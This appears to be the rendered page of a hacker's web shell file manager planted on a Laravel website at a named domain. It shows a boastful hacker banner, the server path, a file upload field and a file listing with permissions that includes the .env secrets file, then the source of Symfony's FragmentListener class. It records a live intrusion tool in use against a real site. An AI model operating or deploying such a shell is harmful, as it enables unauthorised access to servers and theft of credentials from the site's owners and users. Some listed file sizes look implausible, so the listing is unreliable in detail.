I am a hacker in the dark of a very cold night

path :/var/www/html/vorne.webheaydemo.com

upload file:

List of files:

name file	size	edit	permission
.editorconfig	276 KB	March 05 2024 07:12:34	0666
.env	1385 KB	May 24 2024 16:43:55	0666
.env.example	1088 KB	March 05 2024 07:12:34	0666
.gitattributes	190 KB	March 05 2024 07:12:34	0666
.gitignore	245 KB	March 05 2024 07:12:34	0666
.htaccess	947 KB	July 04 2023 21:25:08	0664
.rnd	1024 KB	March 13 2024 04:51:14	0666
README.md	472 KB	March 22 2024 10:35:00	0666
app	-	March 05 2024 07:12:34	0777
artisan	1739 KB	March 05 2024 07:12:34	0666
bootstrap	-	March 05 2024 07:12:34	0777
composer.json	2829 KB	May 13 2024 12:10:04	0666
composer.lock	417205 KB	March 19 2024 12:13:14	0666
config	-	July 03 2025 02:53:36	0777
database	-	March 05 2024 07:12:34	0777
index.php	1816 KB	May 13 2024 10:32:36	0666
lang	-	May 13 2024 14:53:26	0777
manifest.json	913 KB	May 14 2024 03:57:26	0664
package.json	398 KB	March 05 2024 07:12:34	0666
phpunit.xml	1206 KB	March 05 2024 07:12:34	0666
public	-	July 03 2025 02:37:20	0777
resources	-	May 13 2024 12:09:36	0777
routes	-	March 05 2024 07:12:34	0777
service-worker.js	924 KB	March 05 2024 07:12:34	0666
storage	-	March 05 2024 10:03:52	0777
symlink.php	218 KB	March 05 2024 07:12:34	0666
tests	-	March 05 2024 07:12:34	0777
vendor	-	March 19 2024 12:13:14	0777
vite.config.js	326 KB	March 05 2024 07:12:34	0666

* * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\HttpKernel\EventListener; use Symfony\Component\EventDispatcher\EventSubscriberInterface; use Symfony\Component\HttpFoundation\Request; use Symfony\Component\HttpKernel\Event\RequestEvent; use Symfony\Component\HttpKernel\Exception\AccessDeniedHttpException; use Symfony\Component\HttpKernel\KernelEvents; use Symfony\Component\HttpKernel\UriSigner; /** * Handles content fragments represented by special URIs. * * All URL paths starting with /_fragment are handled as * content fragments by this listener. * * Throws an AccessDeniedHttpException exception if the request * is not signed or if it is not an internal sub-request. * * @author Fabien Potencier * * @final */ class FragmentListener implements EventSubscriberInterface { private $signer; private string $fragmentPath; /** * @param string $fragmentPath The path that triggers this listener */ public function __construct(UriSigner $signer, string $fragmentPath = '/_fragment') { $this->signer = $signer; $this->fragmentPath = $fragmentPath; } /** * Fixes request attributes when the path is '/_fragment'. * * @throws AccessDeniedHttpException if the request does not come from a trusted IP */ public function onKernelRequest(RequestEvent $event) { $request = $event->getRequest(); if ($this->fragmentPath !== rawurldecode($request->getPathInfo())) { return; } if ($request->attributes->has('_controller')) { // Is a sub-request: no need to parse _path but it should still be removed from query parameters as below. $request->query->remove('_path'); return; } if ($event->isMainRequest()) { $this->validateRequest($request); } parse_str($request->query->get('_path', ''), $attributes); $request->attributes->add($attributes); $request->attributes->set('_route_params', array_replace($request->attributes->get('_route_params', []), $attributes)); $request->query->remove('_path'); } protected function validateRequest(Request $request) { // is the Request safe? if (!$request->isMethodSafe()) { throw new AccessDeniedHttpException(); } // is the Request signed? if ($this->signer->checkRequest($request)) { return; } throw new AccessDeniedHttpException(); } public static function getSubscribedEvents(): array { return [ KernelEvents::REQUEST => [['onKernelRequest', 48]], ]; } }